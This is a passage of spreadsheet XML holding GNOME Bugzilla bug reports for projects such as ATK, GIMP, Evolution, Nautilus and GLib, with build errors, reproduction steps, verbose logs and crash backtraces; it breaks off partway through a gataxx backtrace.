/bin/sh ../libtool --tag=CC   --mode=link gcc  -Os -Wall -version-info 2809:1:2809 -no-undefined  -L/sw/lib -o libatk-1.0.la -rpath /sw/lib atkaction.lo atkcomponent.lo atkdocument.lo atkeditabletext.lo atkgobjectaccessible.lo atkhyperlink.lo atkhyperlinkimpl.lo atkhypertext.lo atkimage.lo atknoopobject.lo atknoopobjectfactory.lo atkobject.lo atkobjectfactory.lo atkregistry.lo atkrelation.lo atkrelationset.lo atkselection.lo atkstate.lo atkstateset.lo atkstreamablecontent.lo atktable.lo atktext.lo atkutil.lo atkmisc.lo atkvalue.lo atk-enum-types.lo -L/sw/lib -lgobject-2.0 -lglib-2.0 
gcc -dynamiclib  -o .libs/libatk-1.0.0.2809.1.dylib  .libs/atkaction.o .libs/atkcomponent.o .libs/atkdocument.o .libs/atkeditabletext.o .libs/atkgobjectaccessible.o .libs/atkhyperlink.o .libs/atkhyperlinkimpl.o .libs/atkhypertext.o .libs/atkimage.o .libs/atknoopobject.o .libs/atknoopobjectfactory.o .libs/atkobject.o .libs/atkobjectfactory.o .libs/atkregistry.o .libs/atkrelation.o .libs/atkrelationset.o .libs/atkselection.o .libs/atkstate.o .libs/atkstateset.o .libs/atkstreamablecontent.o .libs/atktable.o .libs/atktext.o .libs/atkutil.o .libs/atkmisc.o .libs/atkvalue.o .libs/atk-enum-types.o  -L/sw/lib /sw/lib/libgobject-2.0.dylib /sw/lib/libglib-2.0.dylib  -install_name  /sw/lib/libatk-1.0.0.dylib -Wl-compatibility_version -Wl2810 -Wl-current_version -Wl2810.1
ld: Undefined symbols:
_libintl_dgettext
_libintl_bind_textdomain_codeset
_libintl_bindtextdomain
/usr/libexec/gcc/powerpc-apple-darwin8/4.0.1/libtool: internal link edit command failed
make[1]: *** [libatk-1.0.la] Error 1
atkobject.c uses gettext functions directly and ./configure does check for gettext but libatk but does not directly link against the gettext library. It worked by luck for me previously--I assume some dependent library was publishing this linking info?--but better to actually use what you use instead of hoping something else already uses it.
The gettext ac macros set the proper flag in INTLLIBS so all you have to do is pass that variable.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-356536</t>
  </si>
  <si>
    <t>fallback code path broken</t>
  </si>
  <si>
    <t>We are seeing problems where the applet fails to initiate a dbus connection.
If that happens libgswitchit tries to set up the group names from the layout
names but it does not set up the short names and that causes a segfault later
on...</t>
  </si>
  <si>
    <t>NAUTILUS-42633</t>
  </si>
  <si>
    <t>Erase shouldn't be a searchable emblem</t>
  </si>
  <si>
    <t xml:space="preserve">When you click on the find toolbar button then you do a search by emblem in
the drop down list of the emblems the Erase Emblem emblem is there.
The Erase Emblem emblem can't be assigned to files or folders and therefor
it should not be in the list.
------- Additional Comments From darin@bentspoon.com 2000-08-31 11:11:12 ----
Should take only one line of code to fix this.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:27:59 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 18:59:39 ----
Batch-assigning QA ownership of Search Interface bugs to Josh Barrow.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:38 -------
The original reporter (linuxfan@ionet.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GOSSIP-305371</t>
  </si>
  <si>
    <t>Location of presence resubscription UI</t>
  </si>
  <si>
    <t>If a user has lost his subscription to a user's presence for any reason there
is no obvious mechanism to re-subscribe to its presence.
Not precisely sure where such a feature should go. Most clients seem to have
this in the context menu either in the root or in a Subscription/Presence
sub-menu.</t>
  </si>
  <si>
    <t>RHYTHMBOX-306918</t>
  </si>
  <si>
    <t>burner update</t>
  </si>
  <si>
    <t>Here is an update for the burner code.  This is from my arch repo.</t>
  </si>
  <si>
    <t>GNOME-COMMANDER-332261</t>
  </si>
  <si>
    <t>buildsystem</t>
  </si>
  <si>
    <t>exec_prefix not properly parsed during configure/makefiles</t>
  </si>
  <si>
    <t>Please describe the problem:
WARNING: Could not list files in ${exec_prefix}/lib/gnome-commander/plugins: No
such file or directory
This is rolled on Slackware 10.2.  The directory
/usr/local/lib/gnome-commander/plugins exists and has the plugin library files.
 However when gnome-commander starts up this error appers.
Steps to reproduce:
1. fresh unpack of gnome-commander-1.1.7.tar.bz2
2. ./configure --prefix=/usr/local &amp;&amp; make OR ./configure --prefix=/usr/local
--exec-prefix=/usr/local &amp;&amp; make)
3. make install
4. simply run the application
Actual results:
WARNING: Could not list files in ${exec_prefix}/lib/gnome-commander/plugins: No
such file or directory
Gnome-commander continues to operate fine.
Expected results:
It should properly replace ${exec_prefix} with the /usr/local.  
Does this happen every time?
Yes
Other information:
After ./configure :
(In all Makefiles) but particularly in the ./src/Makefile
PLUGIN_DIR=${exec_prefix}/lib/gnome-commander/plugins
plugin_manager.c it seems is not getting the full directory or at least not
expanding ${exec_prefix}.  Fixing the Makefiles fixes the problem:  I modified
the root level ./configure script and changed:
PLUGIN_DIR=${libdir}/${PACKAGE}/plugins
to
PLUGIN_DIR=/usr/local/lib/${PACKAGE}/plugins
and rebuilt.  It then appears to find the plugin directory fine.  I'm only
capable of poking around to find the problem.  Not really capable myself of
fixing anything since I'm unfamiliar with automake/autogen and really Makefiles
in general.</t>
  </si>
  <si>
    <t>sk238</t>
  </si>
  <si>
    <t>GLIB-336438</t>
  </si>
  <si>
    <t>unicode collate test failing</t>
  </si>
  <si>
    <t>Please describe the problem:
3 of 4 template files located in tests/collate/* is incorrect. Unicode sorting
(and I guess in any other encoding) describes that uppercase letter scancode is
grater that number but smaller than lowercase.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>rwx</t>
  </si>
  <si>
    <t>GNOME-APPLETS-104032</t>
  </si>
  <si>
    <t>[Multihead] The command set for execution in Inbox Monitor applet gets invoked on the wrong screen</t>
  </si>
  <si>
    <t>Steps to reproduce:
- Right click on the menu panel in secondary sceen and choose add to
  panel select internet and click on inbox monitor.
- Right click on the applet and select preferences.
- Configure the mail server. Configure Before each update When new 
  mail  arrives When clicked and Command to run before checking new 
  mail to some known applications.
- Click on close and then right click on inbox applet and click on 
  Check for mail. 
 You can see the application windows (the commands to execute) are coming  
 in the primary screen. 
 Also I see one of the Error message also comes on the primary screen.</t>
  </si>
  <si>
    <t>EVOLUTION-236276</t>
  </si>
  <si>
    <t>Tracking bug for string translation</t>
  </si>
  <si>
    <t>Tracking string translation reports</t>
  </si>
  <si>
    <t>YELP-328172</t>
  </si>
  <si>
    <t>Allow multiple man sections (11petc) to map to a single TOC category in man.xml</t>
  </si>
  <si>
    <t>Attaching a patch to add support for mapping several man sections such as 1 1p etc. to a single TOC section in data/man.xml.in
This gives us several benefits:
  * we can add man sections as we come across them and put them in the most 
    appropriate toc section already available without requiring new translations
  * Once the sections are listed in man.xml.in the link trail will not be broken 
    for that section anymore (open the GET.1 man page in the current Yelp - you'll 
    notice that the link trail at the top does not work because section 1p is not 
    listed in man.xml.in)
Details:
  The sect attribute of the  element is now a space separated list of manual sections to put under this section in the toc.</t>
  </si>
  <si>
    <t>EVOLUTION-233381</t>
  </si>
  <si>
    <t>ldap address book searching when composing an new mail message</t>
  </si>
  <si>
    <t>I've seen some huge progress in the ldap abilities/functionality in the more current releases but I still have a problem when I create a new message. When I click the box 'to' and I'm able to just add contacts by pointing and clicking from my personal address book but when I pick a different address book location and point it to my ldap addresses it doesn't see anyone nor will it allow me to search it from that dialog box. I can go to the ldap directory (not in the compose window but the standard evolution window) and pick individual people right click and send a message to them but when sending to more than one I have to cut and paste them. I know many people don't use this feature but for those of us who have computers at work home and a laptop on the road ldap is essential to keeping the addressbooks current. (Please don't give the old use rsync solution as it's just a hack work around for something that if you're gonig to allow me to choose my ldap address book it should work. Please help me out every time I get the last dev build or rc I hope it's fixed but it hasn't yet) 
Thanks a ton
Brooke
brooke@bertling.org
Please fill in this template when reporting a bug unless you know what you are doing.
Description of Problem:
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen? 
Additional Information:</t>
  </si>
  <si>
    <t>brooke</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-324055</t>
  </si>
  <si>
    <t>procman doesn't list any processes when my processes is selected</t>
  </si>
  <si>
    <t>as title says i'm using libgtop and procman from CVS HEAD from a few hours ago</t>
  </si>
  <si>
    <t>GIMP-155446</t>
  </si>
  <si>
    <t>Zoom actions are messed up</t>
  </si>
  <si>
    <t>a) Zoom in has disappeared from the menus and shortcut editor (though it's
clearly still present in the actions code and can be manually assigned a
shortcut by editing menurc.)
b) Zoom in a lot and Zoom out a lot are swapped: zoom in a lot zooms out a
lot and vice versa. the code looks correct though (?)</t>
  </si>
  <si>
    <t>GTRANSLATOR-346758</t>
  </si>
  <si>
    <t>Add Urdu (ur) to the list of  languages in header settings</t>
  </si>
  <si>
    <t>In Edit/Preferences/PO Header/Language there is no Urdu (ur) entry.
Could you please add it?
This issue has been reported to the gnome-i18n mailing list by an Urdu translator.</t>
  </si>
  <si>
    <t>GLIB-156808</t>
  </si>
  <si>
    <t>GOption doesn't handle conflicts between groups</t>
  </si>
  <si>
    <t>If liba and libb both have a --debug option in their option groups using them
together will at best produce undefined behaviour from GOption. If we don't
handle such conflict we should warn if they occur. But I would prefer to handle
them somehow. Proposal: allow to specify a prefix when adding a group so that
in the scenario above the group from liba could get prefix a the other one
b and the goption would parse --a-debug and --b-debug. 
That doesn't resolve the conflict for short options but at least it makes all
options reachable via long options.</t>
  </si>
  <si>
    <t>NAUTILUS-109530</t>
  </si>
  <si>
    <t>Throbber present only on one window after save session</t>
  </si>
  <si>
    <t>1. Open two (or more) nautilus windows.
2. Save session logout and login into the desktop.
3. Observe that the nautilus throbber (right most end of the icon
toolbar) is shown only for one of the windows. The remaining window(s)
do not contain the throbber.
This behaviour is observed only in sun builds where some optimization flags
are used. 
Thanks.</t>
  </si>
  <si>
    <t>EVOLUTION-260515</t>
  </si>
  <si>
    <t>signature setting is not preserved changing Autogenerated to None</t>
  </si>
  <si>
    <t>Description of Problem:
When I try to change the signature setting from Autogenerated to None
and click OK or Close in the account properties dialog it reverts to
the previous setting the next time I open the dialog.
Steps to reproduce the problem:
1. Open account dialog choose account change signature setting
2. Click ok
3. Reopen dialog note setting has reverted to Autogenerated</t>
  </si>
  <si>
    <t>GIMP-430146</t>
  </si>
  <si>
    <t>plug-in menu entries are untranslated</t>
  </si>
  <si>
    <t>Some menu entries (seems plug-ins) appears untranslated. No errors showed. This problem comes up from the last GIMP experimental snapshot.
My system is an Italian localized PPC Linux Ubuntu Edgy but others italian users reported the same problem.
$gimp-2.3 --verbose  
This is a development version of GIMP.  Debug messages may appear here.
INIT: gimp_load_config
Parsing '/home/marco/.gimp-2.3/unitrc'
Analisi di /usr/local/etc/gimp/2.0/gimprc
Analisi di /home/marco/.gimp-2.3/gimprc
gimp_composite: use=yes verbose=no
Processor instruction sets: -mmx -sse -sse2 -3dnow -altivec -vis
Aggiunta tema 'Default' (/usr/local/share/gimp/2.0/themes/Default)
Aggiunta tema 'Small' (/usr/local/share/gimp/2.0/themes/Small)
Scrittura di '/home/marco/.gimp-2.3/themerc'
Trying splash '/home/marco/.gimp-2.3/gimp-splash.png' ... failed
Trying splash '/usr/local/share/gimp/2.0/images/gimp-splash.png' ... OK
INIT: gimp_initialize
INIT: gimp_real_initialize
INIT: gui_initialize_after_callback
INIT: gimp_restore
Parsing '/home/marco/.gimp-2.3/parasiterc'
Loading 'brush factory' data
Loading 'pattern factory' data
Loading 'palette factory' data
Loading 'gradient factory' data
Loading fonts
Parsing '/home/marco/.gimp-2.3/documents'
Parsing '/home/marco/.gimp-2.3/templaterc'
Parsing '/home/marco/.gimp-2.3/modulerc'
INIT: gui_restore_callback
clipboard: writable pixbuf format: image/png
clipboard: writable pixbuf format: image/x-icon
clipboard: writable pixbuf format: image/tiff
clipboard: writable pixbuf format: image/bmp
clipboard: writable pixbuf format: image/x-bmp
clipboard: writable pixbuf format: image/x-MS-bmp
clipboard: writable pixbuf format: image/jpeg
Parsing '/home/marco/.gimp-2.3/sessionrc'
Parsing '/home/marco/.gimp-2.3/toolrc'
Parsing '/home/marco/.gimp-2.3/contextrc'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-rect-select-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-rect-select-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-ellipse-select-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-ellipse-select-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-free-select-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-free-select-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-fuzzy-select-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-fuzzy-select-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-by-color-select-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-by-color-select-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-iscissors-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-iscissors-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-foreground-select-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-foreground-select-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-vector-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-vector-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-color-picker-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-color-picker-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-zoom-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-zoom-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-measure-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-measure-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-move-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-move-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-align-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-align-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-crop-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-crop-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-rotate-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-rotate-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-scale-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-scale-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-shear-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-shear-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-perspective-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-perspective-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-flip-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-flip-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-text-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-text-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-bucket-fill-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-bucket-fill-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-blend-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-blend-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-pencil-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-pencil-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-paintbrush-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-paintbrush-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-eraser-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-eraser-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-airbrush-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-airbrush-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-ink-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-ink-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-clone-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-clone-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-heal-tool' 
arsing '/home/marco/.gimp-2.3/tool-options/gimp-heal-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-perspective-clone-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-perspective-clone-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-convolve-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-convolve-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-smudge-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-smudge-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-dodge-burn-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-dodge-burn-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-color-balance-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-color-balance-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-hue-saturation-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-hue-saturation-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-colorize-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-colorize-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-brightness-contrast-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-brightness-contrast-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-threshold-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-threshold-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-levels-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-levels-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-curves-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-curves-tool.presets'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-posterize-tool'
Parsing '/home/marco/.gimp-2.3/tool-options/gimp-posterize-tool.presets'
INIT: gimp_real_restore
Analisi di /home/marco/.gimp-2.3/pluginrc
Avvio estensioni: 'extension-script-fu'
INIT: gui_restore_after_callback
Parsing '/home/marco/.gimp-2.3/menurc'
Parsing '/home/marco/.gimp-2.3/devicerc'
Parsing '/home/marco/.gimp-2.3/controllerrc'
Parsing '/home/marco/.gimp-2.3/colorrc'
loading menu '/usr/local/share/gimp/2.0/menus/toolbox-menu.xml' for /toolbox-menubar</t>
  </si>
  <si>
    <t>ciampix</t>
  </si>
  <si>
    <t>EVOLUTION-211251</t>
  </si>
  <si>
    <t>Two bugs</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.14.99
Synopsis: Two bugs
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
I have set pref. to get images for HTML but this does not work I have
to do it manually.
Also the new (unread) message count to appear net to folder does not
work right.  Either it does not show the count at all or show the count
but does not update the count as I read the messages.
Unknown reporter: ooman@ooplace.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>ooman</t>
  </si>
  <si>
    <t>SHOTWELL-715236</t>
  </si>
  <si>
    <t>Full-screen (F11) view w/ floating control bar</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by jim@yorba.org 2009-04-20 16:41:00 -0700 ----
Original Redmine bug id: 177
Original URL: http://redmine.yorba.org/issues/177
Searchable id: yorba-bug-177
Original author: Jim Nelson
Original description:
Full-screen (F11) view w/ floating control bar
---- Additional Comments From shotwell-maint@gnome.bugs 2013-05-01 11:42:00 -0700 ----
### History
####
#1
Updated by Adam Dingle over 4 years ago
  * **Priority** set to _High_
####
#2
Updated by Jim Nelson over 4 years ago
  * **Status** changed from _Open_ to _5_
  * **Resolution** set to _fixed_
  * **% Done** set to _100_
####
#3
Updated by Charles Lindsay 7 months ago
  * **Status** changed from _5_ to _Fixed_
--- Bug imported by chaz@yorba.org 2013-11-25 21:41 UTC  ---
This bug was previously known as _bug_ 177 at http://redmine.yorba.org/show_bug.cgi?id=177
Unknown Component 
   Using default product and component set in Parameters 
Unknown version  in product shotwell. 
   Setting version to !unspecified.
Unknown milestone unknown in product shotwell. 
   Setting to default milestone for this product ---.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>TOTEM-346492</t>
  </si>
  <si>
    <t>mozilla viewer i18n problem</t>
  </si>
  <si>
    <t>totem-mozilla-viewer.c doesn't use bindtextdomain+bind_textdomain_codeset+textdomain to initialise gettext.</t>
  </si>
  <si>
    <t>BRASERO-355019</t>
  </si>
  <si>
    <t>0.4.4 fails to build on Ubuntu: missing /usr/lib/libXrender.la</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. ./configure
2. make
3. 
Stack trace:
x
Other information:
http://lists.debian.org/debian-x/2006/04/msg00919.html</t>
  </si>
  <si>
    <t>danderson3</t>
  </si>
  <si>
    <t>RHYTHMBOX-120581</t>
  </si>
  <si>
    <t>Crash while advancing playlist using multimedia keys</t>
  </si>
  <si>
    <t>OVERVIEW:
Attempting to advance to the next track using the multimedia keys while
stopped (or at the end of the playlist with repeat disabled) causes a crash.
STEPS TO REPRODUCE:
1) Start Rhythmbox
2) Use multimedia key to go to the next song
-- or --
1) Disable repeat
2) Begin playing the last track
3) Use multimedia key to go to the next song
BACKTRACE:
[New Thread 16384 (LWP 29115)]
[New Thread 32769 (LWP 29116)]
[New Thread 16386 (LWP 29117)]
0x40ccef29 in wait4 () from /lib/libc.so.6
#0  0x40ccef29 in wait4 () from /lib/libc.so.6
#1  0x40d4f234 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4098f103 in waitpid () from /lib/libpthread.so.0
#3  0x400684ba in libgnomeui_module_info_get ()
   from /usr/lib/./libgnomeui-2.so.0
#4  0x40990dfd in __pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x08093228 in rb_source_get_node_view (source=0x81a9858) at rb-source.c:318
#7  0x08065b69 in rb_shell_player_jump_to_current (player=0x81a9858)
    at rb-shell-player.c:818
#8  0x0806617b in rb_shell_player_do_next (player=0x81a9858)
    at rb-shell-player.c:1018
#9  0x08067c4c in filter_mmkeys (xevent=0xbffff390 event=0x8198460 
    data=0x81a9858) at rb-shell-player.c:1674</t>
  </si>
  <si>
    <t>davecs</t>
  </si>
  <si>
    <t>PYGOBJECT-744690</t>
  </si>
  <si>
    <t>Gio.VolumeMonitor().get_connected_drives() crashes</t>
  </si>
  <si>
    <t>Reported at https://plus.google.com/109637860626261571611/posts/GSea6jx1mnn
Crashes under Python 3 and Python 2.
$ python
Python 2.7.9 (default Dec 14 2014 10:12:16)
[GCC 4.9.2] on linux2
Type help copyright credits or license for more information.
&gt;&gt;&gt; from gi.repository import Gio
&gt;&gt;&gt; v=Gio.VolumeMonitor()
&gt;&gt;&gt; v.get_connected_drives()
Segmentation fault (core dumped)</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-523694</t>
  </si>
  <si>
    <t>allow building with gucharmap trunk</t>
  </si>
  <si>
    <t>There will soon be an API change on gucharmap trunk. Attached patch updates the charmap plugin to work with both gucharmap trunk and stable.</t>
  </si>
  <si>
    <t>ZENITY-453713</t>
  </si>
  <si>
    <t>Zenity radiolist / checklist dialogs fail to return a value.</t>
  </si>
  <si>
    <t>Please describe the problem:
Ubuntu bug has been reported here: https://bugs.launchpad.net/ubuntu/+source/zenity/+bug/123994
Some zenity dialog should return the selected value but it fails.
Steps to reproduce:
Run
$ echo $(zenity --list --radiolist --column Col1 --column Col2 FALSE first TRUE second)
Actual results:
 echo $(zenity --list --radiolist --column Col1 --column Col2 FALSE first TRUE second)
(zenity:28988): GLib-GObject-CRITICAL **: g_value_get_string: assertion `G_VALUE_HOLDS_STRING (value)' failed
(null)
Expected results:
first / second is written out
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>GTK+-362439</t>
  </si>
  <si>
    <t>gtkicontheme::pixbuf_supports_svg leaks GList</t>
  </si>
  <si>
    <t>the format list is leaked the second time the function is called.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-105606</t>
  </si>
  <si>
    <t>crash in gataxx when opening properties</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-games
Severity: critical
Version: GNOME2.2.0 2.2.0
os_details: Gnome.Org
Synopsis: crash in gataxx when opening properties
Bugzilla-Product: gnome-games
Bugzilla-Component: gataxx
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
crash in properties
Steps to reproduce the problem:
1. open gataxx
2. go to properties
3. wait 1 or 2 seconds 
Actual Results:
crash
Expected Results:
be able to edit properties
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/home/gnome220/bin/gataxx'
[New Thread 1024 (LWP 1286)]
0x0ef3cc98 in wait4 () from /lib/libc.so.6
#0  0x0ef3cc98 in wait4 () from /lib/libc.so.6
#1  0x0ef3cc4c in waitpid () from /lib/libc.so.6
#2  0x0f32fdec in waitpid () from /lib/libpthread.so.0
#3  0x0ff9f9f0 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
#4  0x0f32cf7c in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x0f32a378 in pthread_mutex_lock () from /lib/libpthread.so.0
#7  0x0f34878c in __DTOR_END__ () from /lib/libpthread.so.0
#8  0x0f0b5c8c in g_free (mem=0x7f455056) at gmem.c:186
#9  0x100090a4 in reload_properties () at properties.c:645
#10 0x10005c7c in key_changed_cb (tmp_client=0x7f455056 cnx_id=0 
    tmp_entry=0x100d4768 tmp_data=0x0) at gataxx.c:869
#11 0x0f63dad4 in notify_listeners_callback (listeners=0x7f455056
key=0x0 
    cnxn_id=150994947 listener_data=0x10029a08 user_data=0x7ffff928)
    at gconf-client.c:2332
#12 0x0f6294ac in notify_listener_list (listeners=0x10040cc8 list=0x0
    key=0x100d4730 /apps/gataxx/animate 
    callback=0xf63d960 
user_data=0x7ffff928)
    at gconf-listeners.c:588
#13 0x0f6296d4 in ltable_notify (lt=0x10040cc8 
    key=0x100d4730 /apps/gataxx/animate 
    callback=0xf63d960 
user_data=0x7ffff928)
    at gconf-listeners.c:654
#14 0x0f628b4c in gconf_listeners_notify (listeners=0x7f455056
all_above=0x0 
    callback=0x100d4768 user_data=0x0) at gconf-listeners.c:184
#15 0x0f63db88 in notify_one_entry (client=0x10040a90
entry=0x100d4768)
    at gconf-client.c:2357
#16 0x0f63dc84 in gconf_client_flush_notifies (client=0x10040a90)
    at gconf-client.c:2397
#17 0x0f63d8a4 in notify_idle_callback (data=0x10000000) at
gconf-client.c:2291
#18 0x0f0b2fec in g_idle_dispatch (source=0x7f455056
callback=0x10000000 
    user_data=0x7f455056) at gmain.c:3164
#19 0x0f0afe9c in g_main_dispatch (context=0x10037688) at gmain.c:1653
#20 0x0f0b1080 in g_main_context_dispatch (context=0x10037688) at
gmain.c:2197
#21 0x0f0b144c in g_main_context_iterate (context=0x10037688 block=1 
    dispatch=1 self=0x0) at gmain.c:2278
#22 0x0f0b1d20 in g_main_loop_run (loop=0x1016e668) at gmain.c:2498
#23 0x0faa9b8c in gtk_main () at gtkmain.c:1092
#24 0x10005e90 in main (argc=1 argv=0x7ffffb44) at gataxx.c:929
#25 0x0eeaec30 in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 1024 (LWP 1286)):
#0  0x0ef3cc98 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x0ef3cc4c in waitpid () from /lib/libc.so.6
No symbol table info available.
#2  0x0f32fdec in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x0ff9f9f0 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
	estatus = 0
	in_segv = 1
	pid = 512
#4  0x0f32cf7c in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x0f32a378 in pthread_mutex_lock () from /lib/libpthread.so.0
No symbol table info available.
#7  0x0f34878c in __DTOR_END__ () from /lib/libpthread.so.0
No symbol table info available.
#8  0x0f0b5c8c in g_free (mem=0x7f455056) at gmem.c:186
No locals.
#9  0x100090a4 in reload_properties () at properties.c:645
No locals.
#10 0x10005c7c in key_changed_cb (tmp_client=0x7f455056 cnx_id=0 
    tmp_entry=0x100d4768 tmp_data=0x0) at gataxx.c:869
No locals.
#11 0x0f63dad4 in notify_listeners_callback (listeners=0x7f455056
key=0x0 
    cnxn_id=150994947 listener_data=0x10029a08 user_data=0x7ffff928)
    at gconf-client.c:2332
	cae = (struct ClientAndEntry *) 0x7ffff928
#12 0x0f6294ac in notify_listener_list (listeners=0x10040cc8 list=0x0
    key=0x100d4730 /apps/gataxx/animate 
    callback=0xf63d960 
user_data=0x7ffff928)
    at gconf-listeners.c:588
	l = (Listener *) 0x100d4768
	tmp = (GList *) 0x10027d18
#13 0x0f6296d4 in ltable_notify (lt=0x10040cc8 
    key=0x100d4730 /apps/gataxx/animate 
    callback=0xf63d960 
user_data=0x7ffff928)
    at gconf-listeners.c:654
	dirs = (gchar **) 0x1014f650
	i = 251424320
	noroot_key = (
